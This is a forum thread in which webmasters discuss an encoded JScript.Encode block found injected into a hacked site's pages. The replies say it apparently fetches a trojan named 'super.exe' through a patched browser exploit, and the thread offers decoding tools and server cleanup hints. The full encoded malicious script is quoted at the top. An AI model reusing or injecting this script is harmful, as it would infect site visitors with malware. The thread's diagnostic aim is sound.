|
hey h@ckers
Can someone tell me what this is? Or where it is coming from, it is loading a trojan I believe.
<SCRIPT language=JScript.Encode>#@~^5woAAAhahahaha@&@&@&-mD,wWai@&-lMP;w^WC[Ni@&-lMPW(%I@&7lMP8E.sp@&-lM~tbN[n q:LI@&\CD,OKYC^W(Li@&@&bW`eE2VKl[n9#@&P@&d(ED^xEzkEa+.RnaJI@&)@&@&6EU^DkWU~bxrYaGa `b@& @&PP,P,~P,kW`ewG2*@&P,~P,PP,`@&P,P,P~P72KwxhbUNK h ^M+lOnhW2Eac*i@&i\mDPKAK[X,'~wKw [KmEsnxDR4K[zi@&@&@&P~P~~,P~wK2R9W^;s+xO (o/W^GM'E(Vmm3ri@&7W~W[Xc/Oz^+R(GD9+D,x~JkW^k[P8smmVPZ26ri@&7KAW[zc/OX^ncwGkkDkW 'rC4kWsED+EI@&dW~GNHR/Dzs+cV0O'~EZJI@&iGAKNz kYXsncYGw{~r!Ep@&i\lMPDn:ai@&dD+h2{B@!G(.,/YHsn'rwK/rYrG ).+^CYb\nIr@*@!C~4Dn0{EE_E[-rPW A^;D{B2lM+UOcNW1;:xYcLnYAV:nxO$Hq[`'Ek|0.Cs+-Ebc/OX^nc\rkk(kVbYHx-rtrN9+UwrBPrI@&iY+s2Q'@&JKx\W;dr;Y{vNKm;hxY LY3VhxO~X&N`'J1skxO-r# dDXV \b/k(rskDX{-Etr[9+U-rvP'@&6UtWEdn}\nD{v9W^!:xYcoO2^+h+ Y$z&N`'Em^k+ OwJ*RkYzVn 7kdk(rVbYzx'J\rdb4s+'EEPw@&W HW!/9WSxxBal.n YR9Gm!:+ O oYAVn:nUDAzq9c-rkmWMl:nwr# /Dz^+ 7kkk4bVbOX{-E\b/r8^+-rIwmD+ O wKwc/4WAc8~q~8SF*i2CM+xO !wsWm[Nx8ialDxD fKZsk13cbpB@*,w@&&-@&@!9(.,P&fx-E^^knxDwJ,?Ped2'wE7kdk(r^kOH)4kN9+ IPaWdkDkGU=l4kGV!Y+p~OWa) Xi~s0O) +*p-E@*'@&@!rhTPUW1C1tn,4KDND{qPkYzV'wESkND4'l!!aaIt kTY4'XTZwai,^EM/G.=tlU[p-EP9z /.1''JJ34!.V3JwJ,@*@!&9k\@*@!zm@*@!J[r\@*Jp@&@&@&~~,P~P,~W~W[zckxUnMCPHdxD+hai@&PP,P,~Pi8@&8@&@&W; mYbGx,mVCU`*@&P@&7E2sKl[+9xFp@&~~,PP~~,kW`aGa#@&,P,PP,P,7wKw tbNnc*i@&)@&@&b0`e;2VKl9+[#@&`@&P~P,~P,PrUbYwG2v#I@&iAbx[KhcWx(+6GDEUVKl[x1V+mUi@&8@&@&@&WE mDkGx~9KZsk1V`*@&`@&ihkU[Kh /O:khW!Y`EW(%R1Vrm0`bIE~&ZT#p@&8@&@&WE mDkGx~d4WAwK2`*@&`@&,PP~~,P~k6c!wsKl9+N*@&,~P,P~P, d.nDED I@&,PP,~~P,W(LxhrU9WAR-+ Y dMm2sns+UYp@&,P~,P,PPb0vZwKwb@&,P~~,PP,`@&,PP,~~P, dbxrY2Ga`bi@&~P,P~~,d8@&@&iwGwcd4WAvhbxNKhcn\xORk m.nx(BAk NWS n\xDRdm.nxe~8SF*i@&79Wm;hxORTnD2s:xY~X&[`rkm0Mlhnr#RkOX^+R^nWY{hbx[WA \nxD /1Dnn (OAr NGhcd1Dnxd+0DO9Gm!:nxDR8G9XR1skxYdnWY3NKm;:nUDR8 W9zRkm.G^VSnWDi@&d9G1EhxDRoYAs+s+UY~X([vJk|WDm:+rb /DX^+ YG2{hrx9Ghc+-n YRd^M+nxIRSkU9WSR/1Dnx:W2O9W^;s+xD 4KNXc^skxDKGwQ[Km;:UYc4G[HR/^.KVsKK2p@&N@&@&@&0E mDrW Pj+DbssA\+ O/v#@&P@&7YKYmVG4%x9W^EsnxDRCs^RVnUTY4i@&76W.vk,'PZi ,rP@!P[W1Ehn YRmsVcV+ LOtpPb_Q#`@&iP~PbW`9W^;s+xO mVs`bbcYCT1m:+{'r)J,['P9W^;s+xD l^V`bb k9"{J^Vrn Y^l^sJ*@&779Wm;hxORms^`r*RKx:KEkn:K\n'ktGAaWwpN@& )@&@&bWc"!w^WCNn[*@&`@&id+DKrhWEOcr?nYzs^2-xD/`*irSPW!T#p@&@&79Wm!h+ YRS.rY`E@![k-~,k['bm0Mlhn,xlhn{km0MCs+~,?:5SA'r-kkk8k^kOz=tk9[+ iwKdrYbW )C4dG^EO+pOWa'TI^+0OxZiAk9O4)qptko4Y=qiK\nD6VGA=t k9[+ J@*@!rWDm:PWDCh4GD9nD{JqE,xlhn{J^Vbn YWMls+J,k9xJ1Vr+ YW.m:+r~PkYX^nxJaWkkOkGU=DnVmOk7+IOKw'R+l!IVWD'RW cZihbND4)F!Ti4+rL4Y)FT!pJ@*@!&r0Mls+@*@!&[b\@*B*I@&iNG^!:+UOch.kDnvB@!mP6WV9+MxJktnV^)dOmDY! 2J,YlMLnY{J1Vr+UO6DC:EPbNxE1VknUDmCV^E,/OHV'J7kkr4bVrYH)4r9N+ INb/w^Cz) W +I4n4m\rWMlEMVc:9+0C;^Y:b ^4W.;Vbm3*ir@*@!Jl@*B*i@&79Wm!h+ YRTnO2^+s+UY$z&NcJ1skxO^mVVEbcmsk1Vv#I@&d9Wm!:UY ch.kD+cv@!k0MC:P/M^xJm4KEO)8smxVJ,dYHVnxr\kdr(kskDz=tr9Nxi9kk2VmXl xKxnIr@*@!Jr0Ml:@*v#p@&)@&@&XHIDAAhahahaha^#~@</SCRIPT> |
Encrypytd code
|
Quote:
|
Quote:
|
Quote:
|
i belive it says signup for coins cuties and push justsasha...
but i will forward this to someone i know that might be able to help ya out if hes still around hope it gets sorted out bud.. |
"Kill All Americans"
|
Quote:
|
|
theres a tool around here somewhere that decodes that shit, might be the one yt is talking about, i forget :(
|
i like the general there's a tool comment .. u'd need the tool used and in many cases, to know the key length used to generate the encryption, ie RSA / Blowfish / 512s / 1028 and so on. But if you have time to waste, see "InLine Encryption" and that should help you.
|
hmm... just called CTU but jack bauer is still in the field. hold on... chlooooeeee!! :winkwink:
|
|
Could you post the page where you found it?
|
send me a text file of this to genbucks[at]gmail.com and I will see what my bud can do
|
try here: http://netdemon.net/decode.html
|
Quote:
|
i know,but that site has links to sites that can decode script. i tried a few of them but they didnt' work
|
Quote:
|
hold on and ill track it down.
|
Quote:
Thanks |
Quote:
|
Alien words ? lol
|
Quote:
|
its trying to download something called super.exe ?
|
yeah, i got hit with it last night from dv . com luckily my system stopped it right away.
|
the code in on page http://earthunplugged.org/abbaz.html
|
Quote:
Here's the thing: Code:
<SCRIPT LANGUAGE="JScript.Encode"> |
Code:
|
nice work punkworld! what did you use?
|
Quote:
Cool thanx, its an exploit that has been patched already , heres another example of it no encoded in practise http://earthunplugged.org/aa/ and yes what did you use to decode that with , i always come across those.. |
Is super.exe loading off of the same server as the code is on?
|
how do you get rid of this??
|
eye.c.q # 219681950 hit me up punk
|
Quote:
but ms has patched that |
Quote:
|
super.exe is NOT on this server
|
I meant, how do you get rid of it server-side?
|
This is strongdong's server if you are confused. He is trying to get rid of it. I am trying to help him.
|
You have been hacked. Someone has replaced your httpd file with their own. To quickly fix the problem, add a space to the end of your body tag:
blah blah color=000000 > and it should go away. Next, have your host recompile and restart apache. Then get me on ICQ, 161124816 |
Quote:
|
Quote:
http://www.virtualconspiracy.com/ind...crdec/download |
V Rocks... I'm trying to contact you on icq, it's my server... 78861564
|
Quote:
thanks , and swedguy too |
Holy shit, that is indeed one nasty piece of code.
punkworld - do you have experience in this area (encrypted javascript not trojans)? |
This is it decrypted:
Code:
< SCRIPT language = JScript.Encode > var pop; |
You can get your own standalone decoder here: http://www.programurl.com/software-s...wnloadnow.html
|
| All times are GMT -7. The time now is 08:23 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123